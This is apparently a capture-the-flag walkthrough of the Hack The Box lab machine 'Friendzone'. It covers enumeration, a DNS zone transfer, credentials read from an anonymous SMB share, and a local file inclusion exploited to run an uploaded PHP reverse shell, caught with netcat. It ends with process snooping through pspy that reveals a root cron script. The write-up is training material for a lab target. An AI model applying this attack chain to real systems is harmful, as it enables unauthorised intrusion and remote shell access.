HTB Friendzone

$ sudo nmap -A -T4 -p- 10.10.10.123

[sudo] password for ruben: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 09:43 CEST
Nmap scan report for 10.10.10.123
Host is up (0.053s latency).
Not shown: 65528 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/1%OT=21%CT=1%CU=40427%PV=Y%DS=2%DC=T%G=Y%TM=5F7588E
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 1h43m54s, median: -1s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2020-10-01T10:44:24+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-01T07:44:23
|_  start_date: N/A

TRACEROUTE (using port 3306/tcp)
HOP RTT      ADDRESS
1   96.36 ms 10.10.14.1
2   96.82 ms 10.10.10.123

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.10 seconds

$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://10.10.10.123/

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.123/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/08 16:55:12 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/10/08 16:55:35 Finished
===============================================================

Access to http://10.10.10.123

Acess to https://10.10.10.123/

We discovered that SSL cert is using a common name as friendzone.red (it is a vhost).
So we can access then to https://friendzone.red/ (after this host was added to the /etc/host file)

We can do a zone transfer for that domain I saw earlier on the main page and get the list of all sub-domains.

More info about DNS Zone Transfers can be found here: https://www.acunetix.com/blog/articles/dns-zone-transfers-axfr/

$ dig axfr friendzone.red @10.10.10.123

; <<>> DiG 9.16.6-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 44 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: jue oct 01 11:29:39 CEST 2020
;; XFR size: 8 records (messages 1, bytes 289)

VHosts found:

friendzone.red
administrator1.friendzone.red
hr.friendzone.red
uploads.friendzone.red

These virtual hosts need to be added to the host file.

As we have SMB available, we can start to enumerate which shares we have available.

$ smbclient -N -L //10.10.10.123

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
Files           Disk      FriendZone Samba Server Files /etc/Files
general         Disk      FriendZone Samba Server Files
Development     Disk      FriendZone Samba Server Files
IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

$ smbmap -H 10.10.10.123

[+] Guest session   	IP: 10.10.10.123:445	Name: friendzone.htb                                    
Disk                                    Permissions	Comment
----                                    -----------	-------
print$                                  NO ACCESS	Printer Drivers
Files                                   NO ACCESS	FriendZone Samba Server Files /etc/Files
general                                 READ ONLY	FriendZone Samba Server Files
Development                             READ, WRITE	FriendZone Samba Server Files
IPC$                                    NO ACCESS	IPC Service (FriendZone server (Samba, Ubuntu))

Only general and Development can be accessed.
Development share can also be used to upload a file.

$ smbclient -N \\10.10.10.123\Files

tree connect failed: NT_STATUS_ACCESS_DENIED

$ smbclient -N \\10.10.10.123\general

Try "help" to get a list of possible commands.
smb: \> dir

smb: > dir

  .                                   D        0  Wed Jan 16 21:10:51 2019
  ..                                  D        0  Wed Jan 23 22:51:02 2019
  creds.txt                           N       57  Wed Oct 10 01:52:42 2018

9221460 blocks of size 1024. 6459256 blocks available

smb: > get creds.txt

getting file \creds.txt of size 57 as creds.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)

smb: > cd .. smb: > exit $ smbclient -N \\10.10.10.123\Development

Try "help" to get a list of possible commands.
smb: \>

smb: > dir

  .                                   D        0  Wed Jan 16 21:03:49 2019
  ..                                  D        0  Wed Jan 23 22:51:02 2019

9221460 blocks of size 1024. 6459256 blocks available

$ cat creds.txt

creds for the admin THING:

admin:WORKWORKHhallelujah@#

Running also autorecon we found some interesting elements:

smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 5
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

We know the paths of the SMB shares:

Path: C:\etc\Development
Path: C:\etc\hole
Path: C:\tmp
Path: C:\etc\general
Path: C:\var\lib\samba\printers

As we discovered different vhosts, we can also run gobuster with them.

$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u https://friendzone.red/ -k

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://friendzone.red/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/08 16:56:44 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/10/08 16:57:06 Finished
===============================================================

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u

https://administrator1.friendzone.red -k -x .php 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://administrator1.friendzone.red
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/10/08 17:37:03 Starting gobuster
===============================================================
/images (Status: 301)
/login.php (Status: 200)
/dashboard.php (Status: 200)
/timestamp.php (Status: 200)
===============================================================
2020/10/08 17:52:06 Finished
===============================================================

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://hr.friendzone.red -k

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://hr.friendzone.red
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/08 18:10:47 Starting gobuster
===============================================================
===============================================================
2020/10/08 18:18:41 Finished
===============================================================

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://hr.friendzone.red -k -x .php

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://hr.friendzone.red
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/10/08 17:52:45 Starting gobuster
===============================================================
===============================================================
2020/10/08 18:09:10 Finished
===============================================================

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://uploads.friendzone.red -k

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://uploads.friendzone.red
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/08 18:19:09 Starting gobuster
===============================================================
/files (Status: 301)
===============================================================
2020/10/08 18:26:50 Finished
===============================================================

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://uploads.friendzone.red -k -x .php

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://uploads.friendzone.red
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/10/08 18:27:04 Starting gobuster
===============================================================
/files (Status: 301)
/upload.php (Status: 200)
===============================================================
2020/10/08 18:42:22 Finished
===============================================================

Access to https://administrator1.friendzone.red

Use credentials found previously (admin:WORKWORKHhallelujah@#)

You’ll be redirected to:

https://administrator1.friendzone.red/login.php

Login Done ! visit /dashboard.php

Let’s visit this page:

https://administrator1.friendzone.red/dashboard.php

Try what they suggest us to do:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=pagename

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login

If we analyze these parameters:

image_id: Contains the image of the web

https://administrator1.friendzone.red/images/a.jpg

pagename: Seems to load the name of the php file you use as a parameter (login, timestamp…)

We have a Local File Inclusion vulnerability.
https://en.wikipedia.org/wiki/File_inclusion_vulnerability

Then.. could we use this finding to try to upload a file to the system and run it? Maybe a remote shell?

Remembering the autorecon results:

|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE

We can upload the remote shell to this share and try to access to the file from the URL.

The common pestmonkey php reverse shell will do the trick.

We just need to change the IP and the desired port.

$ smbclient -N \\10.10.10.123\Development smb: > put shell.php

putting file shell.php as \shell.php (20,6 kb/s) (average 20,6 kb/s)
smb: \>

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell

$ nc -lvnp 1234

listening on [any] 1234 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.123] 43440
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 13:27:23 up 22 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

We can improve our shell:

$ python3 -c "import pty;pty.spawn('/bin/bash')"

www-data@FriendZone:/$

www-data@FriendZone:/$ whoami

www-data

www-data@FriendZone:/$ cd /home www-data@FriendZone:/home$ ls

friend

www-data@FriendZone:/home/friend$ cat user.txt

a9edXXXXXXXXXXXXXXXXXXXXXXXXXXXX

We can run pspy to start the enumeration to analyze how we can perform a privilege escalation.
(https://github.com/DominicBreuker/pspy)

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

As we are in an x64 bits system,

www-data@FriendZone:/home/friend$ uname -a
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

We can use the x64 bits version of the pspy script.

https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

--2020-10-10 12:52:08--  https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
Resolviendo github.com (github.com)... 140.82.121.3
Conectando con github.com (github.com)[140.82.121.3]:443... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Localización: https://github-production-release-asset-2e65be.s3.amazonaws.com/120821432/d54f2200-c51c-11e9-8d82-f178cd27b2cb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20201010%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20201010T105213Z&X-Amz-Expires=300&X-Amz-Signature=17c6be9e3625356c13d2a32baa8e094d364104f00b76ee4ad185d443de096a83&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy64&response-content-type=application%2Foctet-stream [siguiendo]
--2020-10-10 12:52:13--  https://github-production-release-asset-2e65be.s3.amazonaws.com/120821432/d54f2200-c51c-11e9-8d82-f178cd27b2cb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20201010%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20201010T105213Z&X-Amz-Expires=300&X-Amz-Signature=17c6be9e3625356c13d2a32baa8e094d364104f00b76ee4ad185d443de096a83&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy64&response-content-type=application%2Foctet-stream
Resolviendo github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)... 52.216.154.44
Conectando con github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)[52.216.154.44]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 3078592 (2,9M) [application/octet-stream]
Grabando a: “pspy64”

pspy64                100%[======================>]   2,94M   606KB/s    en 6,7s    

2020-10-10 12:52:21 (450 KB/s) - “pspy64” guardado [3078592/3078592]

$ python -m SimpleHTTPServer 8080 www-data@FriendZone:/etc/Development$ wget http://10.10.14.12:8080/pspy64 pspy64

<lopment$ wget http://10.10.14.12:8080/pspy64 pspy64
--2020-10-10 13:55:56--  http://10.10.14.12:8080/pspy64
Connecting to 10.10.14.12:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64                0%
[                    ]       0  --.-KB/s      pspy64                0%
[                    ]  15.58K  59.8KB/s      pspy64                2%
[                    ]  87.29K   179KB/s      pspy64                4%
[                    ] 141.14K   202KB/s      pspy64                6%
[>                   ] 187.11K   207KB/s      pspy64                8%
[>                   ] 252.78K   222KB/s      pspy64               10%
[=>                  ] 311.89K   229KB/s      pspy64               12%
[=>                  ] 378.88K   237KB/s      pspy64               14%
[=>                  ] 441.92K   245KB/s      pspy64               17%
[==>                 ] 528.61K   259KB/s      pspy64               19%
[==>                 ] 599.54K   268KB/s      pspy64               22%
[===>                ] 686.57K   275KB/s      pspy64               26%
[====>               ] 790.33K   290KB/s      pspy64               28%
[====>               ] 869.14K   294KB/s      pspy64               32%
[=====>              ] 979.47K   308KB/s    etpspy64               35%
[======>             ]   1.04M   317KB/s    etpspy64               39%
[======>             ]   1.16M   353KB/s    etpspy64               42%
[=======>            ]   1.26M   362KB/s    etpspy64               46%
[========>           ]   1.36M   377KB/s    etpspy64               50%
[=========>          ]   1.48M   405KB/s    etpspy64               53%
[=========>          ]   1.58M   417KB/s    etpspy64               58%
[==========>         ]   1.73M   441KB/s    etpspy64               64%
[===========>        ]   1.89M   471KB/s    etpspy64               69%
[============>       ]   2.03M   505KB/s    etpspy64               73%
[=============>      ]   2.16M   522KB/s    etpspy64               79%
[==============>     ]   2.35M   552KB/s    etpspy64               84%
[===============>    ]   2.47M   571KB/s    etpspy64               90%
[=================>  ]   2.65M   601KB/s    etpspy64               94%
[=================>  ]   2.78M   612KB/s    etpspy64              100%
[===================>]   2.94M   639KB/s    in 6.3s    

2020-10-10 13:56:02 (478 KB/s) - 'pspy64' saved [3078592/3078592]

--2020-10-10 13:56:02--  http://pspy64/
Resolving pspy64 (pspy64)... failed: Temporary failure in name resolution.
wget: unable to resolve host address 'pspy64'
FINISHED --2020-10-10 13:56:02--
Total wall clock time: 6.9s
Downloaded: 1 files, 2.9M in 6.3s (478 KB/s)
www-data@FriendZone:/etc/Development$

www-data@FriendZone:/etc/Development$ ls

pspy64	reverse-shell.php  shell.php

www-data@FriendZone:/etc/Development$ chmod +x pspy64 www-data@FriendZone:/etc/Development$ ./pspy64

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/10/10 13:57:56 CMD: UID=0    PID=996    | /usr/sbin/smbd --foreground --no-process-group 
2020/10/10 13:57:56 CMD: UID=0    PID=988    | /usr/sbin/smbd --foreground --no-process-group 
2020/10/10 13:57:56 CMD: UID=0    PID=98     | 
2020/10/10 13:57:56 CMD: UID=0    PID=929    | /usr/sbin/smbd --foreground --no-process-group 
2020/10/10 13:57:56 CMD: UID=0    PID=9      | 
2020/10/10 13:57:56 CMD: UID=0    PID=89     | 
2020/10/10 13:57:56 CMD: UID=107  PID=853    | /usr/sbin/exim4 -bd -q30m 
2020/10/10 13:57:56 CMD: UID=0    PID=85     | 
2020/10/10 13:57:56 CMD: UID=0    PID=849    | /usr/sbin/smbd --foreground --no-process-group 
2020/10/10 13:57:56 CMD: UID=0    PID=844    | /usr/sbin/smbd --foreground --no-process-group 
2020/10/10 13:57:56 CMD: UID=0    PID=843    | /usr/sbin/smbd --foreground --no-process-group 
2020/10/10 13:57:56 CMD: UID=0    PID=82     | 
2020/10/10 13:57:56 CMD: UID=0    PID=81     | 
2020/10/10 13:57:56 CMD: UID=0    PID=80     | 
2020/10/10 13:57:56 CMD: UID=0    PID=8      | 
2020/10/10 13:57:56 CMD: UID=0    PID=79     | 
2020/10/10 13:57:56 CMD: UID=0    PID=78     | 
2020/10/10 13:57:56 CMD: UID=0    PID=77     | 
2020/10/10 13:57:56 CMD: UID=0    PID=741    | /usr/sbin/smbd --foreground --no-process-group 
2020/10/10 13:57:56 CMD: UID=0    PID=7      | 
2020/10/10 13:57:56 CMD: UID=0    PID=6      | 
2020/10/10 13:57:56 CMD: UID=0    PID=566    | /usr/sbin/nmbd --foreground --no-process-group 
2020/10/10 13:57:56 CMD: UID=33   PID=527    | /usr/sbin/apache2 -k start 
2020/10/10 13:57:56 CMD: UID=33   PID=526    | /usr/sbin/apache2 -k start 
2020/10/10 13:57:56 CMD: UID=33   PID=525    | /usr/sbin/apache2 -k start 
2020/10/10 13:57:56 CMD: UID=33   PID=524    | /usr/sbin/apache2 -k start 
2020/10/10 13:57:56 CMD: UID=33   PID=523    | /usr/sbin/apache2 -k start 
2020/10/10 13:57:56 CMD: UID=0    PID=513    | /usr/sbin/apache2 -k start 
2020/10/10 13:57:56 CMD: UID=0    PID=485    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/10/10 13:57:56 CMD: UID=0    PID=473    | /usr/sbin/sshd -D 
2020/10/10 13:57:56 CMD: UID=0    PID=467    | /usr/sbin/vsftpd /etc/vsftpd.conf 
2020/10/10 13:57:56 CMD: UID=109  PID=455    | /usr/sbin/named -f -4 -u bind 
2020/10/10 13:57:56 CMD: UID=0    PID=4      | 
2020/10/10 13:57:56 CMD: UID=0    PID=381    | /usr/bin/VGAuthService 
2020/10/10 13:57:56 CMD: UID=0    PID=380    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2020/10/10 13:57:56 CMD: UID=102  PID=379    | /usr/sbin/rsyslogd -n 
2020/10/10 13:57:56 CMD: UID=103  PID=374    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2020/10/10 13:57:56 CMD: UID=0    PID=373    | /usr/lib/accountsservice/accounts-daemon 
2020/10/10 13:57:56 CMD: UID=0    PID=371    | /lib/systemd/systemd-logind 
2020/10/10 13:57:56 CMD: UID=0    PID=370    | /usr/sbin/cron -f 
2020/10/10 13:57:56 CMD: UID=62583 PID=364    | /lib/systemd/systemd-timesyncd 
2020/10/10 13:57:56 CMD: UID=101  PID=362    | /lib/systemd/systemd-resolved 
2020/10/10 13:57:56 CMD: UID=0    PID=35     | 
2020/10/10 13:57:56 CMD: UID=0    PID=34     | 
2020/10/10 13:57:56 CMD: UID=0    PID=32     | 
2020/10/10 13:57:56 CMD: UID=0    PID=30     | 
2020/10/10 13:57:56 CMD: UID=0    PID=29     | 
2020/10/10 13:57:56 CMD: UID=0    PID=28     | 
2020/10/10 13:57:56 CMD: UID=0    PID=27     | 
2020/10/10 13:57:56 CMD: UID=100  PID=267    | /lib/systemd/systemd-networkd 
2020/10/10 13:57:56 CMD: UID=0    PID=260    | /lib/systemd/systemd-udevd 
2020/10/10 13:57:56 CMD: UID=0    PID=26     | 
2020/10/10 13:57:56 CMD: UID=0    PID=25     | 
2020/10/10 13:57:56 CMD: UID=0    PID=24     | 
2020/10/10 13:57:56 CMD: UID=0    PID=23     | 
2020/10/10 13:57:56 CMD: UID=0    PID=227    | /lib/systemd/systemd-journald 
2020/10/10 13:57:56 CMD: UID=0    PID=223    | /usr/bin/vmtoolsd 
2020/10/10 13:57:56 CMD: UID=0    PID=22     | 
2020/10/10 13:57:56 CMD: UID=0    PID=21     | 
2020/10/10 13:57:56 CMD: UID=0    PID=20     | 
2020/10/10 13:57:56 CMD: UID=0    PID=2      | 
2020/10/10 13:57:56 CMD: UID=0    PID=196    | 
2020/10/10 13:57:56 CMD: UID=0    PID=195    | 
2020/10/10 13:57:56 CMD: UID=0    PID=19     | 
2020/10/10 13:57:56 CMD: UID=0    PID=18     | 
2020/10/10 13:57:56 CMD: UID=0    PID=175    | 
2020/10/10 13:57:56 CMD: UID=0    PID=174    | 
2020/10/10 13:57:56 CMD: UID=0    PID=172    | 
2020/10/10 13:57:56 CMD: UID=0    PID=170    | 
2020/10/10 13:57:56 CMD: UID=0    PID=17     | 
2020/10/10 13:57:56 CMD: UID=0    PID=169    | 
2020/10/10 13:57:56 CMD: UID=0    PID=168    | 
2020/10/10 13:57:56 CMD: UID=0    PID=16     | 
2020/10/10 13:57:56 CMD: UID=0    PID=15     | 
2020/10/10 13:57:56 CMD: UID=0    PID=14     | 
2020/10/10 13:57:56 CMD: UID=0    PID=13     | 
2020/10/10 13:57:56 CMD: UID=33   PID=1204   | ./pspy64 
2020/10/10 13:57:56 CMD: UID=0    PID=1200   | 
2020/10/10 13:57:56 CMD: UID=0    PID=12     | 
2020/10/10 13:57:56 CMD: UID=0    PID=1153   | 
2020/10/10 13:57:56 CMD: UID=0    PID=115    | 
2020/10/10 13:57:56 CMD: UID=0    PID=11     | 
2020/10/10 13:57:56 CMD: UID=0    PID=1078   | 
2020/10/10 13:57:56 CMD: UID=33   PID=1042   | /bin/bash 
2020/10/10 13:57:56 CMD: UID=33   PID=1041   | python3 -c import pty;pty.spawn('/bin/bash') 
2020/10/10 13:57:56 CMD: UID=33   PID=1040   | /bin/sh -i 
2020/10/10 13:57:56 CMD: UID=33   PID=1036   | sh -c uname -a; w; id; /bin/sh -i 
2020/10/10 13:57:56 CMD: UID=33   PID=1027   | /usr/sbin/apache2 -k start 
2020/10/10 13:57:56 CMD: UID=33   PID=1026   | /usr/sbin/apache2 -k start 
2020/10/10 13:57:56 CMD: UID=0    PID=10     | 
2020/10/10 13:57:56 CMD: UID=0    PID=1      | /sbin/init splash 
2020/10/10 13:58:01 CMD: UID=0    PID=1214   | /usr/bin/python /opt/server_admin/reporter.py 
2020/10/10 13:58:01 CMD: UID=0    PID=1213   | /bin/sh -c /opt/server_admin/reporter.py 
2020/10/10 13:58:01 CMD: UID=0    PID=1212   | /usr/sbin/CRON -f 
2020/10/10 14:00:01 CMD: UID=0    PID=1217   | /usr/bin/python /opt/server_admin/reporter.py 
2020/10/10 14:00:01 CMD: UID=0    PID=1216   | /bin/sh -c /opt/server_admin/reporter.py 
2020/10/10 14:00:01 CMD: UID=0    PID=1215   | /usr/sbin/CRON -f 
2020/10/10 14:02:01 CMD: UID=0    PID=1220   | /bin/sh -c /opt/server_admin/reporter.py 
2020/10/10 14:02:01 CMD: UID=0    PID=1219   | /bin/sh -c /opt/server_admin/reporter.py 
2020/10/10 14:02:01 CMD: UID=0    PID=1218   | /usr/sbin/CRON -f 
2020/10/10 14:03:00 CMD: UID=0    PID=1222   | 
2020/10/10 14:04:01 CMD: UID=0    PID=1225   | /usr/bin/python /opt/server_admin/reporter.py 
2020/10/10 14:04:01 CMD: UID=0    PID=1224   | /bin/sh -c /opt/server_admin/reporter.py 
2020/10/10 14:04:01 CMD: UID=0    PID=1223   | /usr/sbin/CRON -f 
2020/10/10 14:05:15 CMD: UID=0    PID=1226   | /usr/sbin/nmbd --foreground --no-process-group 
2020/10/10 14:05:16 CMD: UID=0    PID=1227   | /usr/sbin/exim4 -qG 
